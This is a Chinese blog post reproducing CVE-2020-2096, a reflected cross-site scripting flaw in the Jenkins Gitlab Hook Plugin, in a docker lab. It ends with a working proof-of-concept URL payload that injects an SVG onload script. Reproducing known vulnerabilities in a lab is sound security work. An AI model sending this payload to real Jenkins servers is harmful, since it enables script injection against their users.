Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

admin 2021年3月27日01:58:19评论283 views字数 812阅读2分42秒阅读模式

漏洞概述

 

jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

由于jenkins Gitlab Hook 插件没有在build_now端点中转义项目名称,从而导致反射XSS漏洞。

 

影响版本

 

Jenkins Gitlab Hook Plugin <= 1.4.2

环境搭建

这里使用docker进行安装

docker pull jenkins/jenkins

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现


创建Jenkins挂载目录并授权权限

mkdir -p /var/jenkins_mountchmod 777 /var/jenkins_mount


 Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

配置镜像加速

cd /var/jenkins_mount/vi  hudson.model.UpdateCenter.xml


 

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现 

创建并启动Jenkins容器

 

docker run -d -p 10240:8080 -p 10241:50000 -v /var/jenkins_mount:/var/jenkins_home -v /etc/localtime:/etc/localtime --name myjenkins jenkins/jenkins


 

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现


访问http://your-ip:10240

 

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现


vi /var/jenkins_mount/secrets/initialAdminPassword


 

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现


进入页面后管理jenkins->管理插件->安装Gitlab Hook


Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

安装完后重启jenkins

 

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

漏洞复现

 

访问http://127.0.0.1:10240/login?from=%2F即可看到登录页面

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现


访问http://your-ip:10240/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现



本文始发于微信公众号(锋刃科技):Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月27日01:58:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Jenkins Gitlab Hook Plugin 跨站脚本漏洞(CVE-2020-2096)复现http://cn-sec.com/archives/300524.html

发表评论

匿名网友 填写信息